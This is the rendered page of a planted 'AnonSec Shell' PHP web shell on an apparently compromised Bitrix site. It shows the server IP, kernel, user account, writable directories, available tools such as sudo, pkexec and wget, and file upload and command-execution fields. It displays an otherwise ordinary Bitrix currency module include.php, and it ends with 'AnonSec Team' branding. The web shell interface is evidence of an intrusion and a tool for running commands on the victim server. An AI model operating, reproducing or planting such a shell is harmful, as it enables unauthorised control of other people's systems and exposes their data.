AnonSec Shell
Server IP : 85.193.89.191  /  Your IP : 3.16.218.226
Web Server : Apache
System : Linux 956367-cx40159.tmweb.ru 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
User : bitrix ( 600)
PHP Version : 8.1.27
Disable Function : NONE
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/bitrix/www/bitrix/modules/currency/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/bitrix/www/bitrix/modules/currency/include.php
<?php

require_once __DIR__ . '/autoload.php';

\CJSCore::RegisterExt(
	'currency',
	[
		'js' => '/bitrix/js/currency/core_currency.js',
		'rel' => [
			'core',
			'main.polyfill.promise',
			'currency.currency-core',
		],
	]
);

\CJSCore::RegisterExt(
	'core_money_editor',
	[
		'rel' => [
			'core',
			'currency.money-editor',
		],
		'oninit' => function()
		{
			return [
				'lang_additional' => [
					'CURRENCY' => \Bitrix\Currency\Helpers\Editor::getListCurrency(),
				],
			];
		},
	]
);

\CJSCore::RegisterExt(
	'core_uf_money',
	[
		'js' => '/bitrix/js/currency/core_uf_money.js',
		'css' => '/bitrix/js/currency/css/core_uf_money.css',
		'rel' => [
			'uf',
			'core_money_editor',
		],
	]
);

const CURRENCY_CACHE_DEFAULT_TIME = 10800;
const CURRENCY_ISO_STANDART_URL = 'https://www.iso.org/iso/home/standards/currency_codes.htm';

/*
* @deprecated deprecated since currency 14.0.0
* @see CCurrencyLang::CurrencyFormat()
*/
function CurrencyFormat($price, $currency)
{
	return CCurrencyLang::CurrencyFormat($price, $currency, true);
}

/*
* @deprecated deprecated since currency 14.0.0
* @see CCurrencyLang::CurrencyFormat()
*/
function CurrencyFormatNumber($price, $currency)
{
	return CCurrencyLang::CurrencyFormat($price, $currency, false);
}

Anon7 - 2022
AnonSec Team